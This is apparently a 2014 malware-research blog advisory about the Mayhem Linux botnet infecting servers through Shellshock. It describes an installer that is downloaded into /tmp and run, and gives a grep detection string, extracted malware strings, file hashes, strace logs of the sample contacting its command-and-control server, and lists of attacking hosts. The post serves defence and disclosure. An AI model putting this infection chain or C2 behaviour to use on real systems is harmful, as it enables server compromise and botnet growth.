Tuesday, October 7, 2014

MMD-0029-2014 - Warning of Mayhem shellshock attack

Sticky Note: For the latest incident of Mayhem (via Wordpress login weak password) infection attack, please see these link-->[LINK: 0day.jp/Japanese] and [LINK and LINK: kernelmode/English] and [LINK VirusTotal Comment/English]

We afraid this wave will come during the "shellshock", and it did. The attack wave of "ELF .so malware library", an installer of a known botnet called as "Mayhem" just hit all of us. The attack came from various IP of their botnet into many NIX services, utilizing the shellshock web vulnerability scan method to download the remote installer written in Perl (replacing the previous PHP base infection). It is obviously a new different vector for Mayhem infection, we start calling it as Mayhem Shellshock version of attack.
Thank to @yinettesys (credit: link) for the quick alert & attack vector information, a good work and solid contribution to the community.

The attack

First detection:

2014-10-2 12:51:38 Zulu (UTC)

Payload attack first spotted:

2014-10-5 17:47:16 Zulu (UTC)

Pre-attack Shellshock Scanning PoC:

Payload installation attempt PoC (one-liner Shellshock)

Or as per this pastebin-->[here]

It shows the multiple url to download the Perl installer of Mayhem initial library (the Mayhem installer .so file) from remote host, to be saved in /tmp directory, to be executed after chmod with the 755 permission, under your web server daemon unix user privilege.

Attack grep/detection mitigation method advised:

"expr 1330 + 7"

The scheme:
The first scanner is probing the shellshock vulnerable hosts/network and it has two patterns of shellshock query sent (see the first picture above). The botnet will receive the response of the scanning and sending the infection part of shellshock script (see the second picture above), the one with the wget to download the Perl installer script. The script will be executed in /tmp to execute the ELF .so library and delete it after being executed, so there is no remote file accessed to trigger the infection (unlike the PHP installer version). The .so binaries will be loaded in memory by LD_PRELOAD and stay resident to perform the further botnet operation.


The url in the one-liner script will lead to the Perl script installer of the Mayhem installer library:

The wget logs is showing that the host is still up and alive by the time this post was written:

The 404.cgi file is the Perl installer of the malware library, the neutralized code can be viewed below:

or in this pastebin-->[here]

This script does the same functionality as previous version in PHP, it is just a Perl version which is having x32 and x64 ELF binary file in hex data to be injected into a file via CGI permission on the targeted UNIX OS and run the libs with LD_PRELOAD using the related library (if needed), FYI: the executable process in this installer also will run with your web server daemon unix privilege.

To get the binary, you will need to use the patched that Perl script to save the binaries written in hex, we scratched one, be free to use, modify or improve this script: (click to copy & paste)

If you run it, you will get the malware library files to be used for the reporting or analysis purpose:

Mayhem installer (ELF DYN ".so" LD_PRELOAD)

Below is the hashes & file type of samples we collected in one incident:

$ md5 *.so
MD5 (sess32.so) = 'd5d4cb6dc0eaace5e31dfd32eaf63ae7'
MD5 (sess64.so) = 'd3d96ec99429ff70ab84f2a8cf21067f'

$ file *.so
sess32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, corrupted section header size
sess64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, corrupted section header size
These samples we uploaded in VT in here--> [-1-] and [-2-]

Generally the ELF malware itself work as per previous version mentioned in our post here [-3-] and Yandex team reported research in here [-4-]. But we are suspecting there are changes in the "scanner/spider module" of Mayhem component that is utilizing Shellshock web query/request to send the detected scanning or infection (this is not being confirmed yet..we are lacking of samples, details will be added/updated) .

In the binary dropped by the Perl installer (pls extract the binary first), or in the malicious .so files spotted in the infected machine, you can see these strings which will help you to recognize it as the malware:

0x067BA     R,%d,%d,%d,%s,%s,
0x067CD     P,%u,%u,%u,%u,%u
0x067DF     "POST %s HTTP/1.0"
0x067F1     Host: %s
0x067FB     "Pragma: 1337" <================
0x06809     Content-Length: %d
0x06834     %s/%s
0x0688F     /dev/null <=== spawn..
0x06899     %s/%c.%d
0x068A5     (null)    <=== spawn
0x068B1     "LD_PRELOAD"  <=== preload
0x068BC     "/usr/bin/uname -a"  <=== grab info

The binary is self- decrypted for analysis/detection protection:

As per previous version too. During the execution the malware will drop the hidden file system contains the botnet ELF component files to be used for the further malicious operation (we will look into this encryption later on), as per below filename/permission/attributes/size details:

"-rw-r--r--  1 mmd mmd 12582912 Oct  7 06:58 .cahed_sess"
The samples are also making callback to the remote server (CNC). In our recorded case, this is the following communication:

CNC DNS query(raw):

uname({sysname="Linux", nodename="MY-", release="UNAME-IZ-", version="MMD-BANGS-YOU-", machine="AGAIN"}) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("")}, 16) = 0
poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
sendto(4, "\3666\1\0\0\1\0\0\0\0\0\0\vdackjaniels\3net\0\0\1\0"..., 33, MSG_NOSIGNAL, NULL, 0) = 33
poll([{fd=4, events=POLLIN}], 1, 5000) = 1 ([{fd=4, revents=POLLIN}])
ioctl(4, FIONREAD, [49])    = 0
recvfrom(4, "\3666\201\200\0\1\0\1\0\0\0\0\vdackjaniels\3net\0\0\1\0"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("")}, [16]) = 49
close(4)                    = 0

CNC sending and receiving communication:

connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("")}, 16) = 0
write(4, "POST /mayhem.php HTTP/1.0\r\nHost:"..., 177) = 177
read(4, "HTTP/1.1 200 OK\r\nServer: nginx/1"..., 32768) = 153
read(4, "", 32768)          = 0
close(4)                    = 0

In PCAP capture:

Attack vector report

The host that serves Mayhem Perl script installer is located in France:

Reversed IP: 195-154-184-150.rev.poneytelecom.eu
ASN: 12876
Country: France
↑We will need to clean this ASAP.

In another case the same sample was recorded to be distributed via sendspace.com file share service:

Below is the list of attacker's IP addresses which were reported matched to Mayhem Shellshock attack pattern, thank you to the contributors @yinettesys, @0xAli, @belmonte, @xme

1. Sum up of Mayhem ShellShock scanner and attacker IP source, we compiled as per statistic bellow:
(The data is as per Sat Oct 11 23:52:50 JST 2014, Format: Country, Count)

United States 25 '<=== many attacks come from USA network'
France         4
Turkey         3
Brazil         2
Canada         2
Netherlands    2
United Kingdom 2
Italy          1
Costa Rica     1
Argentina      1
Australia      1
Germany        1
Thailand       1
Kazakhstan     1
Ukraine        1
Poland         1
Indonesia      1
Sweden         1
Vietnam        1
New Zealand    1
Malaysia       1
Austria        1
Japan          1
------------------- +
Total         56 IP  of 23 countries
2. Mayhem Shellshock attackers IP in Geo location details as per Sat Oct 11 23:52:50 JST 2014:
Format: IP Address, City, Region, Country Name, Santa Rosa, CA, United States, Buffalo, NY, United States, Culver City, CA, United States, Overland Park, KS, United States, San Francisco, CA, United States, Seattle, WA, United States, South Bend, IN, United States, Secaucus, NJ, United States, Grand Island, NE, United States, Santa Rosa, CA, United States, Dallas, TX, United States, Provo, UT, United States, Scottsdale, AZ, United States, Kansas City, MO, United States, San Diego, CA, United States, Garden City, NY, United States, Ashburn, VA, United States, Elmhurst, IL, United States, Rio De Janeiro, 21, Brazil, , , Brazil, Amsterdam, 07, Netherlands, , , Netherlands, , , France, , , France, Celâl, 84, Turkey, , , Thailand, , , New Zealand, Chanh Hiep, 75, Vietnam, Montréal, QC, Canada, San José, 08, Costa Rica, , , Argentina, , , Malaysia, Kiev, 12, Ukraine, , , United Kingdom, , , Germany, Astana, 05, Kazakhstan, , , Italy, Jakarta, 04, Indonesia, , , Poland, , , United Kingdom, , , Austria, Spring Hill, 07, Australia, Stockholm, , Sweden, San Antonio, TX, United States, Atlanta, GA, United States, San Antonio, TX, United States, San Antonio, TX, United States, Henderson, NC, United States, Istanbul, , Turkey, Montréal, QC, Canada, Mountain View, CA, United States, Istanbul, , Turkey, Provo, UT, United States, , , France, Tokyo, , Japan, Roubaix, , France
3. Mayhem Shellshock attacker IP per network details as per Sat Oct 11 23:52:50 JST 2014:
Format: IP Address, Reverse Lookup IP, ASN, CIDR, Prefix, Country Code(2bits), ISP Code, ISP Name|emu.arvixe.com.|36351 | | SOFTLAYER | US | ARVIXE.COM | ARVIXE LLC|host.colocrossing.com.|36352 | | AS-COLOCROSSING | US | HUDSONVALLEYHOST.COM | HUDSON VALLEY HOST|thewineconsultant.com.|31815 | | MEDIATEMPLE | US | MEDIATEMPLE.NET | MEDIA TEMPLE INC.|cpanel.webindia.com.|40913 | | QTS-SJC-1 | US | SEALCONSULT.COM | IBIS INC.||26228 | | SERVEPATH | US | GOGRID.COM | GOGRID LLC|ec2-54-213-225-160.us-west-2.compute.amazonaws.com.|16509 | | AMAZON-02 | US | AMAZON.COM | AMAZON.COM INC.|202.smart-dns.net.|12260 | | COLOSTORE | US | COLOSTORE.COM | COLOSTORE.COM||19318 | | NJIIX-AS-1 | US | INTERSERVER.NET | INTERSERVER INC|webvms.kdsi.net.|32101 | | ASN-KLYS | US | KELLYSUPPLY.COM | KELLY SUPPLY COMPANY|starfish.arvixe.com.|36351 | | SOFTLAYER | US | ARVIXE.COM | ARVIXE LLC|s13.nzusatechgroup.com.|36351 | | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.|server.forkliftmarket.com.au.|46606 | | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER|ip-166-62-16-106.ip.secureserver.net.|26496 | | AS-26496-GO-DADDY-CO | US | GODADDY.COM | GODADDY.COM LLC|spanky.myserverplanet.com.|23033 | | WOW | US | MYVIRPUS.COM | DNSSLAVE.COM||10439 | | CARINET | US | PROENLACE.MX | CARI.NET|lazer.webair.com.|27257 | | WEBAIR-INTERNET | US | WEBAIR.COM | WEBAIR INTERNET DEVELOPMENT COMPANY INC.|ec2-75-101-129-180.compute-1.amazonaws.com.|14618 | | AMAZON-AES | US | AMAZON.COM | AMAZON.COM INC.|50-193-119-109-static.hfc.comcastbusiness.net.|7922 | | COMCAST-7922 | US | COMCASTBUSINESS.NET | PLANET PARTS||262652 | | R4C | BR | INTELIGNET.COM.BR | R4C SERVICOS DE INFORMATICA LTDA|forjastaurus.dominiotemporarioidc.com.|19089 | | DH&C | BR | UOL.COM.BR | UNIVERSO ONLINE S.A.|h35-91.net.ix-host.ru.|50968 | | HOSTMASTER | MD | IX-HOST.RU | HOSTMASTER LTD.|LLNH007.local.|16265 | | FIBERRING | NL | LEASEWEB.COM | LEASEWEB B.V.|ns3366463.ip-37-187-77.eu.|16276 | | OVH | FR | OVH.COM | OVH SAS||16276 | | OVH | FR | OVH.COM | OVH SAS||8517 | | ULAKNET | TR | - | CELAL BAYAR UNIVERSITESI||56309 | | SIAMDATA | TH | - | TAN SPIRIT CO. LTD.||54113 | | FASTLY | US | FASTLY.COM | FASTLY INC|sv20.quangtrungdc.name.vn.|24085 | | QTSC-AS | VN | - | IP RANGE ALLOCATE FOR QTSC'S INTERNET DATA CENTER||32613 | | IWEB-AS | CA | IWEB.COM | IWEB TECHNOLOGIES INC.|caam-190-10-14-a037.racsa.co.cr.|3790 | | RADIOGRAFICA | CR | RACSA.CO.CR | SERVICIO CO-LOCATION RACSA|server.cubomagico.tv.|52270 | | X | AR | IFXNW.COM.AR | NXNET||24218 | | GTC-MY-PIP | MY | GLOBALTRANSIT.NET | GTC MY PIP NET|pedlarly-tack.volia.net.|25229 | | VOLIA | UA | VOLIA.NET | KYIVSKI TELEKOMUNIKATSIYNI MEREZHI LLC||13213 | | UK2NET | GB | UK2.NET | UK2 - LTD|s16296639.onlinehome-server.info.|8560 | | ONEANDONE | DE | 1AND1.CO.UK | 1&1 INTERNET AG||9198 | | KAZTELECOM | KZ | - | ENU|alodrink.eu.|31034 | | ARUBA | IT | ARUBA.IT | ARUBA S.P.A.|web2.jabikha.net.|23950 | | GENID-AS | ID | JABIKHA.NET | PT JARINGAN BISNIS KHATULISTIWA|host50-89-206-41.limes.com.pl.|29649 | | LIMES | PL | LIMES.COM.PL | LIMES S.C.|futureis-3.titaninternet.co.uk.|20860 | | IOMART | GB | TITANINTERNET.CO.UK | TITAN INTERNET LTD|d91-130-113-149.cust.tele2.at.|1257 | | TELE2,S | EU | TELE2.AT | TELE2 TELECOMMUNICATION SERVICES GMBH|110-44-30-204.host.neural.net.au.|45844 | | NEURALNETWORKS-AS | AU | NEURAL.NET.AU | NEURAL NETWORKS DATA SERVERS PTY. LTD.|static-83-168-199-4.cust.crystone.se.|35041 | | NET-CRYSTONE | SE | CRYSTONE.SE | CRYSTONE AB|184-106-196-169.static.cloud-ips.com.|19994 | | RACKSPACE | US | RACKSPACE.COM | RACKSPACE HOSTING||32780 | | HOSTINGSERVICES-INC | US | MIDPHASE.COM | HOSTING SERVICES INC.|184-106-196-169.static.cloud-ips.com.|19994 | | RACKSPACE | US | RACKSPACE.COM | RACKSPACE HOSTING|67-23-9-241.static.cloud-ips.com.|33070 | | RMH-14 | US | RACKSPACE.COM | RACKSPACE CLOUD SERVERS|lamp2.ncol.net.|11426 | | SCRR-11426 | US | NCOL.NET | NCOL.NET INC.|host-82-222-172-99.reverse.superonline.net.|34984 | | TELLCOM | TR | SUPERONLINE.NET | TELLCOM ILETISIM HIZMETLERI A.S.||32613 | | IWEB-AS | CA | - | POLLOCK NEAL||15169 | | GOOGLE | US | GOOGLE.COM | GOOGLE INC.|linux.zenpozitif.net.|9121 | | TTNET | TR | SUNUCU.COM.TR | NETFACTOR|142-4-11-48.unifiedlayer.com.|46606 | | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER||16276 | | OVH | FR | OVH.COM | OVH SAS|kokuralab.com.|7684 | | SAKURA | JP | SAKURA.AD.JP | SAKURA INTERNET INC.|tx.irontec.com.|16276 | | OVH | FR | OVH.COM | OVH SAS
With GeoIP graphical view, please click the image below: (thank's to JC for the GIPC!)

Thank you @xme (twitter) for Google mapping all IP sources into more comprehensive detail as per link below↓

These attacker IPs are the combination between (known) Mayhem bots we monitor and unknown sources (including the suspected possibility of new panels/CNC/bots). We are asking to the related ISP to check your host in details if your IP is listed above. The cleaning up of the botnet nodes will reduce the infection speed, please kindly cooperate.

For the sysadmins and ISP please BLOCK the IP address that listed in this report. It is proven wide-ranged targeted attack is on going from those IP, we checked in countries i.e.: Japan, Australia and Malaysia, below is another snip of different attack coming from listed IP addresses:

Thank's to @0xAli for this additional information

Since some requests came: You may ask us the log of attack for the purpose of cleaning your network from Mayhem botnet, by sending us the comment in the bottom of this post, please leave the email address so we can contact you. The comment will not be posted, feel free to test it beforehand.

More message and additional information

This is the warning, made and will be sent in various CERT contacts as reference. The threat is still not being neutralized yet and is still active (has just been started..is more like it) in infecting us. We are decided to be in hurry to raise this alert for the threat awareness. The material is to be added for updates and new analysis, so please take a look back for updates too.

The samples for the research purpose are shared via kernelmode, access here -->(LINK)

If Mayhem botnet uses shellshock, and this is a very serious threat, please work and cooperate together in good coordination in order to stop the source of the threat.

(reserved)We will add the information in here (/reserved)

References of previous version infection report of Mayhem
(ELF .so LD_PRELOAD malware)

1. MMD-0020-2014 - Analysis of infection ELF malware: libworker.so -->LINK
2. Video tutorial to dissect ELF .so malware that's using LD_PRELOAD -->LINK
3. MMD-0024-2014 - Recent Incident Report of ELF (LD_PRELOAD) libworker.so -->LINK
4. Repository of Linux/Mayhem threat in KernelMode.info -->LINK
5. Report by Yandex team, via Virus Bulletin -->LINK
6. Report by DamageLab.org -->LINK
7. Report by Artturi Lehtio via F-Secure blog -->LINK

Thank you for help in raising awareness and mention

We thank you for the help received from IT news media friends to raise awareness and the kindly link & mention our research.

1. Virus Bulletin
2. e-Week IT News
3. Threat Post
4. Security Affairs
5. PC World - Web sites, Business Security, Linux
5. Government Info Security
6. Softpedia - Server related security news
7. US Homeland Security - Daily Open Source Infrastructure Report [PDF]
8. Info Security Magazine
9. CERT Hungary Alert (Hungarian)
10. Kaldata (Bulgaria) Security News
11. SecurityLab (Russia)
12. NovostIT (Russia)
13. HagDig
14. IndusFace
15. Akamai Blog: Five Good Security Articles
16. Security Week
18. ITHome (Taiwan)
and many more, Google search keywords: "mayhem shellshock malwaremustdie"